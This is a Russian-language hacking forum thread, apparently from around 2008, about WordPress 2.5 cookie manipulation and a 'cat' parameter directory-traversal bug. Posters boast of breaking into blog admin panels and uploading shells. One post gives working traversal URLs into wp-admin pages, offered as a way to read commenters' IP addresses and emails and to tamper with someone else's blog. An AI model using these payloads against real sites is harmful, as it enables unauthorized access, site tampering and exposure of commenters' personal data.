![]() |
WordPress 2.5 Cookies Manipulation
Проблемы с надежностью шифрования у вордпресса были всегда. Вспомним 2007 год, когда имея только аутенфикационные данные в виде связки логин и пароль, можно было зайти с администраторскими правами даже без перебора хеша этого пароля, а иньекций в блоге было предостаточно. Ввести элементарный секьюрити фикс не могли начиная с версии 1.5 до 2.3, когда было объявлено о выходе wordpress 2.5. Теперь сразу после инсталяции блога в базу записывается соль, с помощью который высчитывается хеш пароля, помещаемый в cookies юзера. Cookies юзера представляют из себя следующую конструкцию |
боян
http://www.securityfocus.com/archive/1/490887 |
M4g, не жалко - в закрытых разделах лежит без перебора и прочих "но". |
у меня тоже лежит без перебора и прочих но сплойт, основанный все на той же инфе секуритифокуса
|
короче мир дружба жвачка, главное поменьше всяких штук в паблик выкладывать)
З.Ы. единственные версии вп, которые у мну не получилось поиметь (зайти в админку, залить шелл) 2.3.3 и 2.5.1 =\ |
и еще для размышления (будет в хакфаке в хакере в июне)
XXX ВОПРОС XXX Как можно посмотреть IP-адреса и e-mail людей, которые оставили свои комментарии на блоге WordPress? XXX ОТВЕТ XXX Недавно обнаруженная уязвимость в WordPress версий до 2.5 с моей доработкой предоставляет тебе такую возможность :) Итак, чтобы посмотреть полную конфиденциальную инфу комментаторов на блоге, ты должен зарегистрироваться и пройти по адресу http://blog.com/wp233/?cat=1.php/../../../../wp%252dadmin/edit%252dcomments. Также эта бага позволяет тебе всячески поиздеваться над блогом недоброжелателя, например: -редактировать структуру ссылок (http://blog.com/wp233/?cat=1.php/../../../../wp%252dadmin/options%252dpermalink); -активировать и деактивировать плагины (http://blog.com/wp233/?cat=1.php/../../../../wp%252dadmin/plugins); -активировать и деактивировать темы оформления (http://blog.com/wp233/?cat=1.php/../../../../wp%252dadmin/themes); -просматривать все посты блога (включая черновики) (http://blog.com/wp233/?cat=1.php/../../../../wp%252dadmin/edit). И многое другое :) Ты можешь сам подставлять названия файлов из каталога ./wp-admin и ставить свои опыты над вордпрессом. З.Ы. По непроверенной информации бага работает только на Windows-платформах, но, так как я занимался данной уязвимостью только на винде, на никсах можешь поэксперементировать сам. |
Цитата:
|
->Дык это основано на том что фильтрует ./ и не фильтрует .\
не путай, это две разные баги ЗЫ по ходу ВП тут мало кто разбирается =\ |
пруфлинк: http://www.securityfocus.com/bid/28845
WordPress 'cat' Parameter Directory Traversal Vulnerability (Vulnerabilities) еще раз повторяю: это 2 РАЗНЫЕ баги на секуритифокусе последняя не совсем разработана, я ее чуть больше поковырял |
| Время: 20:07 |